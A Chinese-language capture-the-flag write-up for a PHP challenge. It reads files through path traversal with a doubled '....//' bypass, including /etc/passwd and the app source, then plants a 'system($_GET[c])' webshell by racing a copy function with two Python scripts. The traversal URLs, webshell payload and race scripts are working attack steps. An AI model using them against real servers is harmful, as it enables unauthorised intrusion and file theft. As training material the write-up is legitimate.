这是要买flag吗?
先看源码:
<img width="900" height="450" src="data:image/png;base64,/9j/4AAQSkZJRg..."/>
什么都没有。
再看url地址:
http://1.14.97.218:21715/index.php?action=read&img=maimaimai.jpg
联想到是任意文件读取。
尝试读取/etc/passwd。
http://1.14.97.218:21715/index.php?action=read&img=/etc/passwd
<b>Warning</b>: file_get_contents(/var/www/html/img//etc/passwd): failed to open stream: No such file or directory in <b>/var/www/html/index.php</b> on line <b>17</b><br />
<img width="900" height="450" src="data:image/png;base64,"/>
幸好服务器返回了PHP报错信息。发现读取文件时,服务器后台在我们提供的文件路径前,增加了基目录 /var/www/html/img/ 。
猜测过滤了 ../
。估计是
replace( '../' , '') 即替换为空了。 --> 双写绕过
http://1.14.97.218:21715/index.php?action=read&img=....//....//....//....//....//etc/passwd
成功读取/etc/passwd文件。
再尝试读取index.php源码:
http://1.14.97.218:21715/index.php?action=read&img=....//index.php
源码为:
<?php
$rootpath = '/var/www/html/';
$path = md5("compete" . $_SERVER['HTTP_REFERER']);
$sandbox = $rootpath . $path;
@mkdir($sandbox);
@chdir($sandbox);
function cop($filename)
{
copy($filename, $filename . "2.php");
rename($filename . "2.php", $filename);
echo "copy" . $filename . "success";
}
function read($filename)
{
$content = base64_encode(file_get_contents($filename));
echo '<img width="900" height="450" src="data:image/png;base64,' . $content . '"/>';
}
if(isset($_GET['action']) && $_GET['action'] === "copy")
{
$filename = $sandbox . "/" . $path . ".txt";
file_put_contents($filename, "compete" . $_SERVER['HTTP_REFERER']);
cop($filename);
}
else if(isset($_GET['action']) && $_GET['action'] === "read")
{
if(!isset($_GET['img']))
{
$filename = "maimaimai.jpg";
}
else {
$filename = str_replace("../", "", $_GET['img']);
}
$filename = $rootpath . "img/" . $filename;
read($filename);
}
else
{
header("Location: /index.php?action=read&img=maimaimai.jpg");
}
?>
除了read读任意文件外,还有copy函数。可以写入webshell,但是会立即删除。
尝试条件竞争上传webshell。
以下2个脚本同时运行:
import requests
while 1:
# res = requests.get("http://1.14.97.218:21715/index.php?action=copy", headers={"referer": "<?php system('ls /');?>"})
res = requests.get("http://1.14.97.218:21715/index.php?action=copy", headers={"referer": "<?php system($_GET[c]);?>"})
print(res.text)
#script2
import requests
while 1:
response = requests.get(
"http://1.14.97.218:21715/b657f026a2471104c7c5c6af5d5dbbfa/b657f026a2471104c7c5c6af5d5dbbfa.txt2.php?c=ls$IFS$9/")
if response.status_code != 404:
print(response.text)
同时运行,发现根目录下flag文件名为: fla444444444444g
于是读取flag:
http://1.14.97.218:21715/index.php?action=read&img=....//....//....//....//....//fla444444444444g
# DASCTF{43378609768205435621416258245141}